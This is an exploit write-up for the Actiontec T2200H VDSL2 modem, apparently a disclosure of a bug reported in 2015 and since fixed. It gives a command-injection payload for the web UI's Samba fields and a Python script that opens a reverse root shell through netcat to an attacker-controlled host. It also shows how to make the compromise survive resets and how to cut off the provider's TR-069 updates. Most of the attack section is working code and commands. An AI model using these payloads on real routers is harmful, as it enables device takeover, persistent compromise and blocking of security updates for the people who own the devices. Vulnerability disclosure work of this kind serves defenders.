Actiontec T2200H Remote Reverse Root Shell

`### Device Details  
Vendor: Actiontec (Telus Branded, but may work on others)  
Model: T2200H (but likely affecting other similar models of theirs)  
Affected Firmware: T2200H-31.128L.03  
Device Manual:  
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf  
  
Reported: November 2015  
Status: Fixed on newly pushed firmware version  
CVE: Not needed since update is pushed by the provider.  
  
The Telus Actiontec T2200H is Telusa standard bonded VDSL2 modem. It  
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,  
802.11agn wireless, etc.  
  
### Summary of Findings  
  
- root shell access can be obtained as long as an attacker has a login to  
the web UI. The password can always be reset by knowing the device serial  
number printed on the device, if the default password hasn't been changed.  
- There are 2 separate firmware partitions (/dev/mtdblock0 and  
/dev/mtdblock1) that can be mounted read-write and then modified with  
additional files or configuration - surviving reboots and factory resets.  
- TR-069 settings can be modified to not check in to the management server.  
This means that future updates would be impossible without flashing the  
device locally.  
  
### Running single shell commands  
  
Under Advanced Setup > Samba Configuration update either the Samba Username  
or Password with the following: a;iptables -Fa. A USB flash drive needs to  
be plugged into the USB port on the rear of the modem when running the  
exploit from the web GUI. Anything run in this field is executed as the  
root user.  
  
Now after running nmap, all listening ports are open:  
  
$ nmap -p 1-10000 192.168.1.254  
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-08 22:14 MST  
Nmap scan report for 192.168.1.254  
Host is up (0.016s latency).  
Not shown: 9991 closed ports  
PORT STATE SERVICE  
21/tcp open ftp  
22/tcp open ssh  
23/tcp open telnet  
80/tcp open http  
139/tcp open netbios-ssn  
443/tcp open https  
445/tcp open microsoft-ds  
5431/tcp open park-agent  
7547/tcp open unknown  
  
### Obtaining reverse root shell  
  
Create a netcat session locally: nc -k -l 5555  
  
Next weall run the following python code to allow us to pipe /bin/sh back  
to us. Before running the following python code, you will need to login  
successfully to the web-ui through http://192.168.1.254. 192.168.1.9 is  
the IP of the machine listening on netcat.  
  
```  
import requests  
s = requests.session()  
smb_post = { "action" : "savapply",  
"smbdEnable" : '1',  
"smbdPasswd" : "123",  
"smbdUserid" : ";rm /var/fifo2; mknod /var/fifo2 p",  
"smbdVolume" : 'usb1_1',  
"smbdWorkgroup" : "WORKGROUP"}  
  
# creating the fifo pipe  
s.post("http://192.168.1.254/fileshare.cmd", smb_post)  
smb_post["smbdUserid"] = ";cat /var/fifo2 |/bin/sh -i 2>&1 |nc 192.168.1.9  
5555 > /var/fifo2"  
# Using the pipe to send a shell over netcat  
s.post("http://192.168.1.254/fileshare.cmd", smb_post)  
```  
  
Your netcat listener should now be prompted with a root busybox shell:  
  
$ nc -k -l 5555  
BusyBox v1.17.2 (2013-12-27 18:49:15 PST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
# cat /etc/image_version  
T2200H-311283BGW0011043  
#  
  
  
### Other Discoveries  
  
Mounting root filesystem read+write:  
`mount -t jffs2 -o remount,rw mtd:rootfs`  
  
Mounting partition 2 read-write:  
`mount -t jffs2 -o rw /dev/mtdblock1 /mnt`  
  
To allow unrestricted access of the web features (enabling telnet, firmware  
flash, TR-069 configuration, etc.)  
After the root filesystem is mounted read-write:  
```  
cat /webs/perm.txt | sed as/ 4/ 7/a | /webs/perm.txt  
cat /webs/perm2.txt | sed as/ 4/ 7/a | /webs/perm2.txt  
killall -HUP httpd  
```  
  
  
`